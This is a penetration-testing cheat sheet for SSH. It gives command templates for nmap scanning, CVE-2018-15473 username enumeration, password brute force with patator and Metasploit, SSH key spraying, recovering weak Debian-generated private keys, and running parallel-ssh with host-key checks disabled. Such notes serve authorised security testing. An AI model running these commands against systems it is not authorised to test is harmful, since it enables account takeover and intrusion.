22 - SSH

Network scan

nmap can be used to scan the network for SSH services:

nmap -v -p 22 -A -oA nmap_ssh <IP | RANGE | CIDR>

User enumeration (CVE-2018-15473)

The OpenSSH service for all versions < 7.7 are vulnerable to oracle username enumeration.

The Python script sshUsernameEnumExploit as well as the Metasploit module auxiliary/scanner/ssh/ssh_enumusers can be used to validate the presence of a system user:

# [--threads <THREADS>] - Default to 5. If more than 10 are used, the OpenSSH service often gets overwhelmed
# [--outputFile <OUTPUTFILE>] [--outputFormat <{list,json,csv}>]
sshUsernameEnumExploit.py [--port PORT]  (--username <USERNAME> | --userList <USERLIST>) <HOST>

msf> use auxiliary/scanner/ssh/ssh_enumusers

Supported authentication methods

Authentication methods overview

The following authentication methods are possible:

• password authentication: simple request for a single password with no specific prompt.

• keyboard interactive: more complex request for arbitrary number of pieces of information. Can be hooked to two-factor (or multi-factor) authentications (PAM, Kerberos, etc.).

• public key authentication: clients must provide a public key in the list of allowed keys on the server and encrypts a certain data packet using the private key. The public key authentication method is the only method that both client and server software are required to implement.

• host-based authentication: host-based authentication is used to restrict client access only to certain hosts. This method is similar to public key authentication; however, the server additionally maintains a list of hosts mapped to their public keys and will only accept connection with the keys from the pre recorded host.

Supported authentication methods enumeration

A verbose connection attempt will display the authentication methods supported by the server (under debug1: Authentications that can continue:):

ssh -vvv <HOST>

The authentication methods supported by given SSH servers can also be enumerated more automatically using the nmap's ssh-auth-methods NSE script:

nmap -v -Pn -sT -p 22 -sV --script ssh-auth-methods --script-args="ssh.user=<root | USERNAME>" [-iL <INPUT_FILE> | <IP | RANGE | CIDR>]

Legacy DSA public key authentication

To connect to a server using DSA keys with a modern OpenSSH client, the PubkeyAcceptedKeyTypes +ssh-dss option must be added to the client config:

echo 'PubkeyAcceptedKeyTypes +ssh-dss' > ~/.ssh/config

If the client is not correctly configured, the following debug error message will be returned during the authentication process:

debug1: Skipping ssh-dss key ... - not in PubkeyAcceptedKeyTypes

Authentication brute force

Password & keyboard interactive authentication

The patator multi-purpose brute-forcer or the auxiliary/scanner/ssh/ssh_login metasploit module can be used to brute force credentials through the password and keyboard interactive authentication methods:

# auth_type: auth type to use <password|keyboard-interactive>
patator ssh_login host=<HOST> user=<USERNAME> password=<PASSWORD> -x ignore:mesg='Authentication failed.'
patator ssh_login host=<HOST> user=FILE0 password=FILE1 0=<WORDLIST_USER> 1=<WORDLIST_PASSWORD> -x ignore:mesg='Authentication failed.'

msf> auxiliary/scanner/ssh/ssh_login

publickey authentication spraying

The Metasploit's auxiliary/scanner/ssh/ssh_login_pubkey module and the Python script crowbar can be used to brute force SSH keys.

While an exhaustive attack is not possible, the key based brute force can be used for lateral movement once a private key could be compromised.

msf5 > use auxiliary/scanner/ssh/ssh_login_pubkey

python crowbar.py -b sshkey (-u <USERNAME> | -U USERNAME_FILE) -k <KEY_FILE | KEY_FOLDER> -s <CIDR>

A repository of static authorized SSH keys "hardcoded" into software and hardware products is available in the ssh-badkeys GitHub repository.

Known vulnerabilities

OpenSSL Predictable PRNG (CVE-2008-0166)

Due to a default of implementation of the seeding process in the OpenSSL package, all SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 are cryptographically weak.

All possible combination of public / private RSA (2048 and 4096 bits) and DSA (1024 bits) keys can be downloaded here:

https://github.com/g0tmi1k/debian-ssh/tree/master/common_keys
https://github.com/g0tmi1k/debian-ssh/tree/master/uncommon_keys

To retrieve a private key if its public counterpart could somehow be extracted from the server (/root/.ssh/authorized_keys or /home/<USERNAME>/.ssh/authorized_keys through LFI or file system disclosure, etc.):

# Only take the base64 content of the public key in format PEM
grep -rl <KEY> <FOLDER_RSA|FOLDER_DSA>

SSH clients

[Windows] PuTTY

PuTTY is a simple SSH, as well as telnet, rlogin and serial, GUI client for Microsoft Windows, available as an installed program and a standalone binary.

[Linux] parallel-ssh

The parallel-ssh / pssh command-line utility can be used to execute operating system commands through ssh on multiple hosts. The utility will return for each host the return code of the provided command.

The option -x '-q -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null' can be provided to bypass the verification of the target host key and prevent the saving of the host key.

# apt install pssh

# -i: displays the standard output and standard error of each SSH execution. By default, the outputs are not displayed.
# --inline-stdout: displays (only) the standard output of each SSH execution.
# -o <OUTPUT_DIR>: outputs the standard output of each SSH execution in a dedicated file (format: [<USERNAME@>]<HOSTNAME | IP>[:<PORT>][.num]) in the specified folder.
# -A: prompts for the user password (once for all of the specified hosts). By default, a authentication through SSH keys will be conducted.
# -t <0 | NUMBER_SECONDS>: allowed execution timeout in seconds prevent timeout of the execution, which can be necessary for
parallel-ssh [-i | --inline-stdout] [-o <OUTPUT_DIR>] [-A] -l "<USERNAME>" [-h <HOSTFILE> | -H "<HOSTNAME | IP>[:<PORT>] [<HOSTNAME | IP>[:<PORT>]]"] <COMMAND>
parallel-ssh [-i | --inline-stdout] [-o <OUTPUT_DIR>] [-A] [-h <HOST_FILE> | -H "[<USERNAME>@]<HOSTNAME | IP>[:<PORT>] [[<USERNAME>@]<HOSTNAME | IP>[:<PORT>]]"] <COMMAND>

# Bypass host keys verification and prevents the saving of the hosts keys.
parallel-ssh -x '-q -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null' [...]

# Execute the specified with elevated rights through sudo using the provided password.
# The first option is more secure as it does not leave any trace of the password on either the local or remote host but operational problems may arise.
stty -echo; printf "sudo password: "; read PASS; stty echo; echo "${PASS}" | parallel-ssh [...] "sudo -S <COMMAND>"
parallel-ssh [...] "echo <SUDO_PASSWORD> | sudo -S <COMMAND>"